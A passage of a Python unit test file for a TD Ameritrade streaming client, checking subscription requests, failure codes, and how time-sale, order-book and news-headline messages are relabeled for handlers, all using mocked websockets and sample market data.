socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_EQUITY', 'SUBS'))]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'TIMESALE_EQUITY', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.timesale_equity_subs(['GOOG', 'MSFT'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'TIMESALE_EQUITY',
'timestamp': 1590599684016,
'command': 'SUBS',
'content': [{
'seq': 43,
'key': 'MSFT',
'1': 1590599683785,
'2': 179.64,
'3': 100.0,
'4': 111626
}, {
'seq': 0,
'key': 'GOOG',
'1': 1590599678467,
'2': 1406.91,
'3': 100.0,
'4': 8620
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'TIMESALE_EQUITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_timesale_equity_handler(handler)
self.client.add_timesale_equity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'TIMESALE_EQUITY',
'timestamp': 1590599684016,
'command': 'SUBS',
'content': [{
'seq': 43,
'key': 'MSFT',
'TRADE_TIME': 1590599683785,
'LAST_PRICE': 179.64,
'LAST_SIZE': 100.0,
'LAST_SEQUENCE': 111626
}, {
'seq': 0,
'key': 'GOOG',
'TRADE_TIME': 1590599678467,
'LAST_PRICE': 1406.91,
'LAST_SIZE': 100.0,
'LAST_SEQUENCE': 8620
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# TIMESALE_FUTURES
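    # TIMESALE_FUTURES follows the same request/failure/handler pattern as
    # TIMESALE_EQUITY above, keyed by futures symbols.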
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_FUTURES', 'SUBS'))]
await self.client.timesale_futures_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': ('0,1,2,3,4')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_FUTURES', 'SUBS'))]
await self.client.timesale_futures_subs(['/ES', '/CL'], fields=[
StreamClient.TimesaleFields.SYMBOL,
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_FUTURES', 'SUBS'))]
await self.client.timesale_futures_subs(['/ES', '/CL'], fields=[
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'TIMESALE_FUTURES', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.timesale_futures_subs(['/ES', '/CL'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_futures_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'TIMESALE_FUTURES',
'timestamp': 1590600568685,
'command': 'SUBS',
'content': [{
'seq': 0,
'key': '/ES',
'1': 1590600568524,
'2': 2998.0,
'3': 1.0,
'4': 9236856
}, {
'seq': 0,
'key': '/CL',
'1': 1590600568328,
'2': 33.08,
'3': 1.0,
'4': 68989244
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'TIMESALE_FUTURES', 'SUBS')),
json.dumps(stream_item)]
await self.client.timesale_futures_subs(['/ES', '/CL'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_timesale_futures_handler(handler)
self.client.add_timesale_futures_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'TIMESALE_FUTURES',
'timestamp': 1590600568685,
'command': 'SUBS',
'content': [{
'seq': 0,
'key': '/ES',
'TRADE_TIME': 1590600568524,
'LAST_PRICE': 2998.0,
'LAST_SIZE': 1.0,
'LAST_SEQUENCE': 9236856
}, {
'seq': 0,
'key': '/CL',
'TRADE_TIME': 1590600568328,
'LAST_PRICE': 33.08,
'LAST_SIZE': 1.0,
'LAST_SEQUENCE': 68989244
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# TIMESALE_OPTIONS
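    # TIMESALE_OPTIONS: same pattern again, keyed by option symbols; the
    # handler test below relies on synthetic messages (see the TODO).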
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_OPTIONS', 'SUBS'))]
await self.client.timesale_options_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': ('0,1,2,3,4')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_OPTIONS', 'SUBS'))]
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.TimesaleFields.SYMBOL,
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_success_some_fields_no_symbol(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_OPTIONS', 'SUBS'))]
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'TIMESALE_OPTIONS', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
@no_duplicates
# TODO: Replace this with real messages
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_options_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'TIMESALE_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG_052920C620',
'delayed': False,
'1': 1590181199726,
'2': 1000,
'3': 100,
'4': 9990
}, {
'key': 'MSFT_052920C145',
'delayed': False,
'1': 1590181199727,
'2': 1100,
'3': 110,
'4': 9991
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'TIMESALE_OPTIONS', 'SUBS')),
json.dumps(stream_item)]
await self.client.timesale_options_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_timesale_options_handler(handler)
self.client.add_timesale_options_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'TIMESALE_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG_052920C620',
'delayed': False,
'TRADE_TIME': 1590181199726,
'LAST_PRICE': 1000,
'LAST_SIZE': 100,
'LAST_SEQUENCE': 9990
}, {
'key': 'MSFT_052920C145',
'delayed': False,
'TRADE_TIME': 1590181199727,
'LAST_PRICE': 1100,
'LAST_SIZE': 110,
'LAST_SEQUENCE': 9991
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LISTED_BOOK
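    # LISTED_BOOK subscriptions always request fields 0-3; there is no
    # field-selection variant. Handler behavior for all book streams is
    # exercised by the shared __test_book_handler helper further down.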
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_listed_book_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LISTED_BOOK', 'SUBS'))]
await self.client.listed_book_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LISTED_BOOK',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_listed_book_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LISTED_BOOK', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.listed_book_subs(['GOOG', 'MSFT'])
##########################################################################
# NASDAQ_BOOK
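    # NASDAQ_BOOK: same fixed 0-3 field request and failure handling as
    # LISTED_BOOK.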
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_nasdaq_book_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'NASDAQ_BOOK', 'SUBS'))]
await self.client.nasdaq_book_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'NASDAQ_BOOK',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_nasdaq_book_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'NASDAQ_BOOK', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.nasdaq_book_subs(['GOOG', 'MSFT'])
##########################################################################
# OPTIONS_BOOK
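    # OPTIONS_BOOK: same request shape as the other book streams, keyed by
    # option symbols.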
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_options_book_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTIONS_BOOK', 'SUBS'))]
await self.client.options_book_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTIONS_BOOK',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': ('0,1,2,3')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_options_book_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'OPTIONS_BOOK', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.options_book_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
##########################################################################
# Common book handler functionality
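    # The three book handler tests delegate to __test_book_handler, passing the
    # service name, a subscription coroutine, and a callback that registers and
    # returns the sync and async handlers to be checked.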
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_listed_book_handler(self, ws_connect):
async def subs():
await self.client.listed_book_subs(['GOOG', 'MSFT'])
def register_handler():
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_listed_book_handler(handler)
self.client.add_listed_book_handler(async_handler)
return handler, async_handler
return await self.__test_book_handler(
ws_connect, 'LISTED_BOOK', subs, register_handler)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_nasdaq_book_handler(self, ws_connect):
async def subs():
await self.client.nasdaq_book_subs(['GOOG', 'MSFT'])
def register_handler():
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_nasdaq_book_handler(handler)
self.client.add_nasdaq_book_handler(async_handler)
return handler, async_handler
return await self.__test_book_handler(
ws_connect, 'NASDAQ_BOOK', subs, register_handler)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_options_book_handler(self, ws_connect):
async def subs():
await self.client.options_book_subs(['GOOG', 'MSFT'])
def register_handler():
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_options_book_handler(handler)
self.client.add_options_book_handler(async_handler)
return handler, async_handler
return await self.__test_book_handler(
ws_connect, 'OPTIONS_BOOK', subs, register_handler)
@no_duplicates
async def __test_book_handler(
self, ws_connect, service, subs, register_handler):
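        # Shared body for the book handler tests: subscribe via the supplied
        # coroutine, register handlers through the supplied callback, feed one
        # raw book message, and verify it is relabeled into nested BIDS/ASKS
        # structures with per-exchange volume and sequence entries.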
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': service,
'timestamp': 1590532470149,
'command': 'SUBS',
'content': [
{
'key': 'MSFT',
'1': 1590532442608,
'2': [
{
'0': 181.77,
'1': 100,
'2': 1,
'3': [
{
'0': 'edgx',
'1': 100,
'2': 63150257
}
]
},
{
'0': 181.75,
'1': 545,
'2': 2,
'3': [
{
'0': 'NSDQ',
'1': 345,
'2': 62685730
},
{
'0': 'arcx',
'1': 200,
'2': 63242588
}
]
},
{
'0': 157.0,
'1': 100,
'2': 1,
'3': [
{
'0': 'batx',
'1': 100,
'2': 63082708
}
]
}
],
'3': [
{
'0': 181.95,
'1': 100,
'2': 1,
'3': [
{
'0': 'arcx',
'1': 100,
'2': 63006734
}
]
},
{
'0': 181.98,
'1': 48,
'2': 1,
'3': [
{
'0': 'NSDQ',
'1': 48,
'2': 62327464
}
]
},
{
'0': 182.3,
'1': 100,
'2': 1,
'3': [
{
'0': 'edgx',
'1': 100,
'2': 63192542
}
]
},
{
'0': 186.8,
'1': 700,
'2': 1,
'3': [
{
'0': 'batx',
'1': 700,
'2': 60412822
}
]
}
]
},
{
'key': 'GOOG',
'1': 1590532323728,
'2': [
{
'0': 1418.0,
'1': 1,
'2': 1,
'3': [
{
'0': 'NSDQ',
'1': 1,
'2': 54335011
}
]
},
{
'0': 1417.26,
'1': 100,
'2': 1,
'3': [
{
'0': 'batx',
'1': 100,
'2': 62782324
}
]
},
{
'0': 1417.25,
'1': 100,
'2': 1,
'3': [
{
'0': 'arcx',
'1': 100,
'2': 62767878
}
]
},
{
'0': 1400.88,
'1': 100,
'2': 1,
'3': [
{
'0': 'edgx',
'1': 100,
'2': 54000952
}
]
}
],
'3': [
{
'0': 1421.0,
'1': 300,
'2': 2,
'3': [
{
'0': 'edgx',
'1': 200,
'2': 56723908
},
{
'0': 'arcx',
'1': 100,
'2': 62709059
}
]
},
{
'0': 1421.73,
'1': 10,
'2': 1,
'3': [
{
'0': 'NSDQ',
'1': 10,
'2': 62737731
}
]
}
]
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, service, 'SUBS')),
json.dumps(stream_item)]
await subs()
handler, async_handler = register_handler()
await self.client.handle_message()
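        # The relabeled version of stream_item above: the numeric field IDs ('1', '2', '3', ...)
        # are translated to their named equivalents (BOOK_TIME, BIDS, ASKS, ...) before the
        # handlers are invoked.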
expected_item = {
'service': service,
'timestamp': 1590532470149,
'command': 'SUBS',
'content': [
{
'key': 'MSFT',
'BOOK_TIME': 1590532442608,
'BIDS': [
{
'BID_PRICE': 181.77,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'edgx',
'BID_VOLUME': 100,
'SEQUENCE': 63150257
}
]
},
{
'BID_PRICE': 181.75,
'TOTAL_VOLUME': 545,
'NUM_BIDS': 2,
'BIDS': [
{
'EXCHANGE': 'NSDQ',
'BID_VOLUME': 345,
'SEQUENCE': 62685730
},
{
'EXCHANGE': 'arcx',
'BID_VOLUME': 200,
'SEQUENCE': 63242588
}
]
},
{
'BID_PRICE': 157.0,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'batx',
'BID_VOLUME': 100,
'SEQUENCE': 63082708
}
]
}
],
'ASKS': [
{
'ASK_PRICE': 181.95,
'TOTAL_VOLUME': 100,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'arcx',
'ASK_VOLUME': 100,
'SEQUENCE': 63006734
}
]
},
{
'ASK_PRICE': 181.98,
'TOTAL_VOLUME': 48,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'NSDQ',
'ASK_VOLUME': 48,
'SEQUENCE': 62327464
}
]
},
{
'ASK_PRICE': 182.3,
'TOTAL_VOLUME': 100,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'edgx',
'ASK_VOLUME': 100,
'SEQUENCE': 63192542
}
]
},
{
'ASK_PRICE': 186.8,
'TOTAL_VOLUME': 700,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'batx',
'ASK_VOLUME': 700,
'SEQUENCE': 60412822
}
]
}
]
},
{
'key': 'GOOG',
'BOOK_TIME': 1590532323728,
'BIDS': [
{
'BID_PRICE': 1418.0,
'TOTAL_VOLUME': 1,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'NSDQ',
'BID_VOLUME': 1,
'SEQUENCE': 54335011
}
]
},
{
'BID_PRICE': 1417.26,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'batx',
'BID_VOLUME': 100,
'SEQUENCE': 62782324
}
]
},
{
'BID_PRICE': 1417.25,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'arcx',
'BID_VOLUME': 100,
'SEQUENCE': 62767878
}
]
},
{
'BID_PRICE': 1400.88,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'edgx',
'BID_VOLUME': 100,
'SEQUENCE': 54000952
}
]
}
],
'ASKS': [
{
'ASK_PRICE': 1421.0,
'TOTAL_VOLUME': 300,
'NUM_ASKS': 2,
'ASKS': [
{
'EXCHANGE': 'edgx',
'ASK_VOLUME': 200,
'SEQUENCE': 56723908
},
{
'EXCHANGE': 'arcx',
'ASK_VOLUME': 100,
'SEQUENCE': 62709059
}
]
},
{
'ASK_PRICE': 1421.73,
'TOTAL_VOLUME': 10,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'NSDQ',
'ASK_VOLUME': 10,
'SEQUENCE': 62737731
}
]
}
]
}
]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# NEWS_HEADLINE
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_subs_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'NEWS_HEADLINE', 'SUBS'))]
await self.client.news_headline_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'NEWS_HEADLINE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3,4,5,6,7,8,9,10')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'NEWS_HEADLINE', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.news_headline_subs(['GOOG', 'MSFT'])
@no_duplicates
# TODO: Replace this with real messages.
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'NEWS_HEADLINE',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG',
'delayed': False,
'1': 0,
'2': 1590181199727,
'3': '0S21111333342',
'4': 'Active',
'5': 'Google Does Something',
'6': '0S1113435443',
'7': '1',
'8': 'GOOG',
'9': False,
'10': 'Bloomberg',
}, {
'key': 'MSFT',
'delayed': False,
'1': 0,
'2': 1590181199728,
'3': '0S21111333343',
'4': 'Active',
'5': 'Microsoft Does Something',
'6': '0S1113435444',
'7': '2',
'8': 'MSFT',
'9': False,
'10': 'WSJ',
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'NEWS_HEADLINE', 'SUBS')),
json.dumps(stream_item)]
await self.client.news_headline_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_news_headline_handler(handler)
self.client.add_news_headline_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'NEWS_HEADLINE',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG',
'delayed': False,
'ERROR_CODE': 0,
'STORY_DATETIME': 1590181199727,
'HEADLINE_ID': '0S21111333342',
'STATUS': 'Active',
'HEADLINE': 'Google Does Something',
'STORY_ID': '0S1113435443',
'COUNT_FOR_KEYWORD': '1',
'KEYWORD_ARRAY': 'GOOG',
'IS_HOT': False,
'STORY_SOURCE': 'Bloomberg',
}, {
'key': 'MSFT',
'delayed': False,
'ERROR_CODE': 0,
'STORY_DATETIME': 1590181199728,
'HEADLINE_ID': '0S21111333343',
'STATUS': 'Active',
'HEADLINE': 'Microsoft Does Something',
'STORY_ID': '0S1113435444',
'COUNT_FOR_KEYWORD': '2',
'KEYWORD_ARRAY': 'MSFT',
'IS_HOT': False,
'STORY_SOURCE': 'WSJ',
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_not_authorized_notification(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
"notify": [
{
"service": "NEWS_HEADLINE",
"timestamp": 1591500923797,
"content": {
"code": 17,
"msg": "Not authorized for all quotes."
}
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'NEWS_HEADLINE', 'SUBS')),
json.dumps(stream_item)]
await self.client.news_headline_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_news_headline_handler(handler)
self.client.add_news_headline_handler(async_handler)
await self.client.handle_message()
expected_item = {
"service": "NEWS_HEADLINE",
"timestamp": 1591500923797,
"content": {
"code": 17,
"msg": "Not authorized for all quotes."
}
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
###########################################################################
# Handler edge cases
#
# Note: We use CHART_EQUITY as a test case, which leaks the implementation
    # detail that the handler dispatching is implemented by a common component.
# If this were to ever change, these tests will have to be revisited.
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_received_while_awaiting_response(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item),
json.dumps(self.success_response(2, 'CHART_EQUITY', 'ADD'))]
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.chart_equity_subs(['GOOG,MSFT'])
await self.client.chart_equity_add(['INTC'])
handler.assert_called_once_with(stream_item['data'][0])
async_handler.assert_called_once_with(stream_item['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_received_while_awaiting_failed_response_bad_code(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
failed_add_response = self.success_response(2, 'CHART_EQUITY', 'ADD')
failed_add_response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item),
json.dumps(failed_add_response)]
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_equity_add(['INTC'])
handler.assert_called_once_with(stream_item['data'][0])
async_handler.assert_called_once_with(stream_item['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_received_while_receiving_unexpected_response(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
failed_add_response = self.success_response(999, 'CHART_EQUITY', 'ADD')
failed_add_response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item),
json.dumps(failed_add_response)]
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponse):
